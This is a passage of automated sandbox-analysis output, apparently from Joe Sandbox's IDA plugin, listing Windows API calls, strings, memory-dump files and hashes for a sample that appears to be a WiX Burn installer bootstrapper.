                                                            • Failed to move file pointer 0x%x bytes., xrefs: 00D20B62
                                                            • cabextract.cpp, xrefs: 00D20B55
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                            • API String ID: 2976181284-417918914
                                                            • Opcode ID: 444d5914cbbd3f8a1eec0a19f4601a3e0f20d62c7b477a92dd0829a226ae1008
                                                            • Instruction ID: ee43cd6fa96e0f979415112f092b3bd3d1268485c9d15ad38ab7be535a7c992c
                                                            • Opcode Fuzzy Hash: 444d5914cbbd3f8a1eec0a19f4601a3e0f20d62c7b477a92dd0829a226ae1008
                                                            • Instruction Fuzzy Hash: DD319476A4022AEFCB11DFA8EC85D6EBB69FF14728B148215FD1497652D370ED108BB0
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?), ref: 00D04123
                                                            • GetLastError.KERNEL32(?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000,00000000), ref: 00D04131
                                                            • CreateDirectoryW.KERNEL32(?,840F01E8,00D05489,?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000), ref: 00D0419A
                                                            • GetLastError.KERNEL32(?,00D1A0E8,00000000,00000000,?,00000000,00D053BD,00000000,?,?,00D0D5B5,?,00000000,00000000), ref: 00D041A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: dirutil.cpp
                                                            • API String ID: 1375471231-2193988115
                                                            • Opcode ID: 9aecc2e16bfa2bddab4c7401cf9d7dd51752f95771f6cc5043f914c52dd25a86
                                                            • Instruction ID: 58cbc3b1acae4320ef4342f4590990dad97d5b8b801ab26a26b0e68643506bee
                                                            • Opcode Fuzzy Hash: 9aecc2e16bfa2bddab4c7401cf9d7dd51752f95771f6cc5043f914c52dd25a86
                                                            • Instruction Fuzzy Hash: AB11A1B6A00335A7D7311AA55C44F3BA654EB76B71F154025EF4DEA2D0E2608C8192F2
                                                            APIs
                                                              • Part of subcall function 00D40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D13FB5,feclient.dll,?,00000000,?,?,?,00D04B12), ref: 00D13B42
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D4112B
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D41163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                            • API String ID: 1586453840-3596319545
                                                            • Opcode ID: b98e833a4f9b3f59c467612a2d4ab45d0abbfebb5c09d66ac6e33f258fc74171
                                                            • Instruction ID: 3a8ea8f4b521746b532dccbc656f9be2c43edc070c59d02853212ed209b719ec
                                                            • Opcode Fuzzy Hash: b98e833a4f9b3f59c467612a2d4ab45d0abbfebb5c09d66ac6e33f258fc74171
                                                            • Instruction Fuzzy Hash: F411D376A44208BBDB21DF94FE82EEABBB8EB10700F440061E900AB041EA719FC1D730
                                                            APIs
                                                            • lstrlenA.KERNEL32(00D1E93B,00000000,00000000,?,?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D40776
                                                            • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF), ref: 00D407B2
                                                            • GetLastError.KERNEL32(?,?,00D40013,00D1E93B,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D407BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWritelstrlen
                                                            • String ID: logutil.cpp
                                                            • API String ID: 606256338-3545173039
                                                            • Opcode ID: 596eab002176cabddb13462df7d52863f0ffeb1d0bb460a79c60344833f6f42c
                                                            • Instruction ID: b92fb0ed87ffb2e38f737f7bb2ddf37102fed344490c66803d1d6b98b39c5c00
                                                            • Opcode Fuzzy Hash: 596eab002176cabddb13462df7d52863f0ffeb1d0bb460a79c60344833f6f42c
                                                            • Instruction Fuzzy Hash: 5011C676A41224ABC3209B698C44EABBE6CEB45770B010225FE05E7240EB70ED00CAF1
                                                            APIs
                                                              • Part of subcall function 00D2140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D20A19,?,?,?), ref: 00D21434
                                                              • Part of subcall function 00D2140C: GetLastError.KERNEL32(?,00D20A19,?,?,?), ref: 00D2143E
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00D20A27
                                                            • GetLastError.KERNEL32 ref: 00D20A31
                                                            Strings
                                                            • Failed to read during cabinet extraction., xrefs: 00D20A5F
                                                            • cabextract.cpp, xrefs: 00D20A55
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$PointerRead
                                                            • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                            • API String ID: 2170121939-2426083571
                                                            • Opcode ID: f5dd81ead56d3c8d7d2a2e2740b4284e1372d23ede76e4b56474e9f9f9fb50ff
                                                            • Instruction ID: c5cbe23f029ffa7c4259c5e603c7777ff92a9760f0b04377cb378fc6a0fef1bf
                                                            • Opcode Fuzzy Hash: f5dd81ead56d3c8d7d2a2e2740b4284e1372d23ede76e4b56474e9f9f9fb50ff
                                                            • Instruction Fuzzy Hash: C4118E76A00279BBCB219F99EC04E9E7F68FB15764B514255FE08A7291D730D910CAF0
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00D20A19,?,?,?), ref: 00D21434
                                                            • GetLastError.KERNEL32(?,00D20A19,?,?,?), ref: 00D2143E
                                                            Strings
                                                            • Failed to move to virtual file pointer., xrefs: 00D2146C
                                                            • cabextract.cpp, xrefs: 00D21462
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                            • API String ID: 2976181284-3005670968
                                                            • Opcode ID: ad07db888e4692d469f17999e9c9a79241f020913450ba81caf03681346104d4
                                                            • Instruction ID: f858bca22e0459f6c11c3c12143c1f4d164a9b76ab4f309726baabb1d8e22445
                                                            • Opcode Fuzzy Hash: ad07db888e4692d469f17999e9c9a79241f020913450ba81caf03681346104d4
                                                            • Instruction Fuzzy Hash: E101D43B50063977CB215A959C08A8BBF18EF20775715C126FD1C9A240D731D810C6F4
                                                            APIs
                                                            • SetEvent.KERNEL32(00D4B478,00000000,?,00D21717,?,00000000,?,00D0C287,?,00D05405,?,00D175A5,?,?,00D05405,?), ref: 00D207BF
                                                            • GetLastError.KERNEL32(?,00D21717,?,00000000,?,00D0C287,?,00D05405,?,00D175A5,?,?,00D05405,?,00D05445,00000001), ref: 00D207C9
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00D207ED
                                                            • Failed to set begin operation event., xrefs: 00D207F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorEventLast
                                                            • String ID: Failed to set begin operation event.$cabextract.cpp
                                                            • API String ID: 3848097054-4159625223
                                                            • Opcode ID: f98b5db0a66c3b55ca3fc266864658d8ed85c7731b3bc2e6b3aff32c9028c0e1
                                                            • Instruction ID: 64881c8dbd2969b1c0d5a4a0e2c756ca8b1caa175146b98fa5b18a2129e9c96f
                                                            • Opcode Fuzzy Hash: f98b5db0a66c3b55ca3fc266864658d8ed85c7731b3bc2e6b3aff32c9028c0e1
                                                            • Instruction Fuzzy Hash: B2F0EC3754263167872066A96D05A8F7E88DF25B757114125FF05FB241E660EC00C6F5
                                                            APIs
                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00D01104,?,?,00000000), ref: 00D05142
                                                            • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00D01104,?,?,00000000), ref: 00D05172
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareStringlstrlen
                                                            • String ID: burn.clean.room
                                                            • API String ID: 1433953587-3055529264
                                                            • Opcode ID: ef6632342995446633382dedf0946214232b623bb55202edf6277b35de0f7aba
                                                            • Instruction ID: 59fdf8df83ee6050460eab3cebfb7bfa7b1119b9efcec6b9b2e02d924f8a3009
                                                            • Opcode Fuzzy Hash: ef6632342995446633382dedf0946214232b623bb55202edf6277b35de0f7aba
                                                            • Instruction Fuzzy Hash: BA014B726007256FC7208B9CAD84B73BBACEB257A0B144117F94AD2754D3B0AC41CEB2
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D03877
                                                            • GetLastError.KERNEL32 ref: 00D03881
                                                            • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00D038EA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1230559179-0
                                                            • Opcode ID: 43160233cd8694ded91ad1bb5dccf20a32d89546f566e8a8225635ad75872e52
                                                            • Instruction ID: 1484269282b3ee71a68652d134ce375978157dc4d1139d49948dd0bc06f93c6a
                                                            • Opcode Fuzzy Hash: 43160233cd8694ded91ad1bb5dccf20a32d89546f566e8a8225635ad75872e52
                                                            • Instruction Fuzzy Hash: 1E21D3B6D0133DABDB209B659C49F9AB7ACDB04720F1505A1FE18E7281DA70DE448AF0
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8), ref: 00D03A20
                                                            • RtlFreeHeap.NTDLL(00000000,?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8,?,00000100), ref: 00D03A27
                                                            • GetLastError.KERNEL32(?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8,?,00000100,?), ref: 00D03A31
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ErrorFreeLastProcess
                                                            • String ID:
                                                            • API String ID: 406640338-0
                                                            • Opcode ID: 39f1b8ea3fc37054f0f6b72a872acfd55b90f4653200a57bced81af60bd4d7b5
                                                            • Instruction ID: aea02368e4b30470574987a976ed26d04914560b29d9fe61f47d5f95a16e96c2
                                                            • Opcode Fuzzy Hash: 39f1b8ea3fc37054f0f6b72a872acfd55b90f4653200a57bced81af60bd4d7b5
                                                            • Instruction Fuzzy Hash: F7D01277A043395787211BEA5C5CA5B7E5CEF16AB27050122FD48D6360D725CD0096F4
                                                            APIs
                                                              • Part of subcall function 00D40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00D17D59,?,?,?), ref: 00D0F7B9
                                                              • Part of subcall function 00D41026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00D0F78E,00000000,Installed,00000000,?), ref: 00D4104B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Installed
                                                            • API String ID: 3677997916-3662710971
                                                            • Opcode ID: 6e97b1e04c08af5d77ac5427cdc9554e32af9de4c884e19cbe62ef1843ba017a
                                                            • Instruction ID: f15b52c3b606d49e569c389e4ba06ef1508d97fb421d9d899d0ba91560bd40df
                                                            • Opcode Fuzzy Hash: 6e97b1e04c08af5d77ac5427cdc9554e32af9de4c884e19cbe62ef1843ba017a
                                                            • Instruction Fuzzy Hash: D601A236820218FFCB21DBA4CC46BDEBBB8EF04721F2541A5F804A7150D3759E44D7A1
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: regutil.cpp
                                                            • API String ID: 71445658-955085611
                                                            • Opcode ID: 842bd3f92dfc50e0b3d3b44e295178b96894ff9ddc18237af6ca129238d4ba72
                                                            • Instruction ID: fadf0c1e3c310a8087c2f3f74ebe434de4eef3bf7010dd30d0845b52db02d54e
                                                            • Opcode Fuzzy Hash: 842bd3f92dfc50e0b3d3b44e295178b96894ff9ddc18237af6ca129238d4ba72
                                                            • Instruction Fuzzy Hash: 06F02B336012327B9B3015968C05B6BBE59EF847B0F194135BF8AAE250E671CC04AAF0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-399585960
                                                            • Opcode ID: b7ab719594cea48ddbdac7f7ac00b58074d62b4cb8b392b6977a688bab7d9dcd
                                                            • Instruction ID: 2ff649c855b69b1a458c581566aa6454ed8a1c05690c7c0ac9ca56de7f1ad434
                                                            • Opcode Fuzzy Hash: b7ab719594cea48ddbdac7f7ac00b58074d62b4cb8b392b6977a688bab7d9dcd
                                                            • Instruction Fuzzy Hash: 73E01DF19193548FE7524FA49CC475C7B635D71104739C7A3D016C6156E7719D0C8F12
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: 1cb42d7aa8d0cbe6d32e717b91a6e7819015a491974b3f40b5bd4aa72289f08e
                                                            • Instruction ID: d8e1cbc420d7ce84f26e1436634d99513a92a62730283b3d352a425a10a6b655
                                                            • Opcode Fuzzy Hash: 1cb42d7aa8d0cbe6d32e717b91a6e7819015a491974b3f40b5bd4aa72289f08e
                                                            • Instruction Fuzzy Hash: B1C0123619430CAB8B005FF4DC0DC56379CB7256127048401B505C2210C738E0108770
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D435F8
                                                              • Part of subcall function 00D4304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D43609,00000000,?,00000000), ref: 00D43069
                                                              • Part of subcall function 00D4304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D2C025,?,00D05405,?,00000000,?), ref: 00D43075
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                            • String ID:
                                                            • API String ID: 52713655-0
                                                            • Opcode ID: 8e97dc6e01c1731ed1515346b3c149a03938b650d8be42dc9f012ab7fcde9f85
                                                            • Instruction ID: 84900c37b13c1e6df30a6c27f5dc0d54744ad270e4bda44e2df1ffd200989df1
                                                            • Opcode Fuzzy Hash: 8e97dc6e01c1731ed1515346b3c149a03938b650d8be42dc9f012ab7fcde9f85
                                                            • Instruction Fuzzy Hash: EE313E76E01229AFCB11DFA9C884ADEB7F8EF08710F06456AED15FB311D6759D008BA4
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00D6AAA0,00000000,80070490,?,?,00D18B19,WiX\Burn,PackageCache,00000000,00D6AAA0,00000000,00000000,80070490), ref: 00D458CA
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D4112B
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D41163
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID:
                                                            • API String ID: 1979452859-0
                                                            • Opcode ID: 89276019c1b73bbffdd8411dc547b410c9d19e5b262cf25d64a80c5f88b1febc
                                                            • Instruction ID: 7faad807f322255aafec1cc3d4f75f0943c0a3900fd73a28fff0599091a26c0a
                                                            • Opcode Fuzzy Hash: 89276019c1b73bbffdd8411dc547b410c9d19e5b262cf25d64a80c5f88b1febc
                                                            • Instruction Fuzzy Hash: 6611C63A800629EFCF226E94E8415AEBB68EF14320B194139FD4167217CB314E50D7F1
                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00D18BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00D034D5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FolderPath
                                                            • String ID:
                                                            • API String ID: 1514166925-0
                                                            • Opcode ID: fe6b770bffc78d495ef4125451ca22e0f10741ae6262d2b33a2a4a0cc1e56cf3
